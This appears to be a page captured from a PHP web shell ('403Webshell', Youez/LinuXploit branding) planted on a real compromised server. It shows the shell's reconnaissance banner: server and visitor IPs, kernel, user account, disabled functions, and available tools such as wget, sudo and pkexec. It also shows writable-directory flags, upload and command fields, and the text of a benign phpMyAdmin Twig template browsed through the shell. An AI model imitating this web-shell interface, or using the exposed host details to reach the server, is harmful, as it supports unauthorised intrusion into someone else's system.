403Webshell
Server IP : 51.89.169.208  /  Your IP : 18.190.158.12
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/www/phpMyAdmin/templates/database/designer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yellowleaf/www/phpMyAdmin/templates/database/designer/page_save_as.twig
<form action="{{ url('/database/designer') }}" method="post" name="save_as_pages" id="save_as_pages" class="ajax">
    {{ get_hidden_inputs(db) }}
    <fieldset class="pma-fieldset" id="page_save_as_options">
        <table class="table table-borderless">
            <tbody>
                <tr>
                    <td>
                        <input type="hidden" name="operation" value="savePage">
                        {% include 'database/designer/page_selector.twig' with {
                            'pdfwork': pdfwork,
                            'pages': pages
                        } only %}
                    </td>
                </tr>
                <tr>
                    <td>
                      <div>
                        <input type="radio" name="save_page" id="savePageSameRadio" value="same" checked>
                        <label for="savePageSameRadio">{% trans 'Save to selected page' %}</label>
                      </div>
                      <div>
                        <input type="radio" name="save_page" id="savePageNewRadio" value="new">
                        <label for="savePageNewRadio">{% trans 'Create a page and save to it' %}</label>
                      </div>
                    </td>
                </tr>
                <tr>
                    <td>
                        <label for="selected_value">{% trans 'New page name' %}</label>
                        <input type="text" name="selected_value" id="selected_value">
                    </td>
                </tr>
            </tbody>
        </table>
    </fieldset>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit